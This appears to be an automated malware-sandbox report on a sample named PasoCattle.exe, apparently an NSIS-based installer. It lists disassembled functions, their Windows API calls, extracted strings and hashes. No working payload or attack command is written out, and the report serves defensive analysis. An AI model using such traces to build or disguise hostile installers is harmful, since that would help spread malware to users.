Opcode Fuzzy Hash: 69bbbded5534bd9ef995404f5a97b34bb8407d7b6723da868d32d2a4867b86ad
Instruction Fuzzy Hash: 3E518C70A0020ECFCB05DFB8E691A9EBBB2FF89304F604568D5146B364EB355A45CB91

Function 057A0848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7bb1c87f7ce51513ff4c869866ae695d604798d3ad0e65600888bc6d6baf8a4
Instruction ID: f458c26b31f85fb9983caab68235874ce188fe8cdb6cc8c3e0b8b47d196696ec
Opcode Fuzzy Hash: c7bb1c87f7ce51513ff4c869866ae695d604798d3ad0e65600888bc6d6baf8a4
Instruction Fuzzy Hash: B4414D70A0020ECFCB05DFB8E595A9EBBB3FF89304F604568D5146B364EB356A45CB91

Function 057A0CA0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2dd176fad0658dc348a42d3e870e2992937d402e2d581d9e4d687f3db5ea16
Instruction ID: b9cab781880ae2c046e47f89ecde84770f9acabde88043719b963b089ee3a260
Opcode Fuzzy Hash: 8a2dd176fad0658dc348a42d3e870e2992937d402e2d581d9e4d687f3db5ea16
Instruction Fuzzy Hash: 7F2134777001158BCB01DBADD488ABEBBE6FBC4214F148A29E90D97341DB30E946CBD1

Function 057A0C90 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d6eb13a663a86e59ff5ed3f6e4b1823e55064fc812ff2b7fb4a885abe9ec291
Instruction ID: c2658d7ac6b3686283a1501e93ae9c55a3a3ace52f986cb92a16b68e28aa784b
Opcode Fuzzy Hash: 0d6eb13a663a86e59ff5ed3f6e4b1823e55064fc812ff2b7fb4a885abe9ec291
Instruction Fuzzy Hash: 3701AD72A0026A9FCB00CBADC5949AEFBF0FB49310F118665E459E7242D330EA40CBE1

Analysis Process: PasoCattle.exePID: 408, Parent PID: 6620COMMON

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	26

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

SeShutdownPrivilege, xrefs: 00403C42
/D=, xrefs: 004039D2
Error launching installer, xrefs: 00403AA9
\Temp, xrefs: 00403A47
NSIS Error, xrefs: 0040390E
~nsu.tmp, xrefs: 00403B23
_?=, xrefs: 00403A90
NCRC, xrefs: 004039A8

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename: %s, xrefs: 004018F8
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Aborting: "%s", xrefs: 0040161D
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
detailprint: %s, xrefs: 00401679
BringToFront, xrefs: 004016BD
Call: %d, xrefs: 0040165A
CreateDirectory: "%s" created, xrefs: 00401849
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
SetFileAttributes failed., xrefs: 004017A1
Jump: %d, xrefs: 00401602
Rename on reboot: %s, xrefs: 00401943
Rename failed: %s, xrefs: 0040194B
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: "%s" (%d), xrefs: 004017BF
Sleep(%d), xrefs: 0040169D

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

"F, xrefs: 00405A4B
RichEd32, xrefs: 00405BD4
_Nb, xrefs: 00405AFD
RichEd20, xrefs: 00405BC9
RichEdit, xrefs: 00405BF0
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
RichEdit20A, xrefs: 00405BE2, 00405BE7
F, xrefs: 00405A22
@jG, xrefs: 00405AF2
.exe, xrefs: 00405A69
.DEFAULT\Control Panel\International, xrefs: 004059C5

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
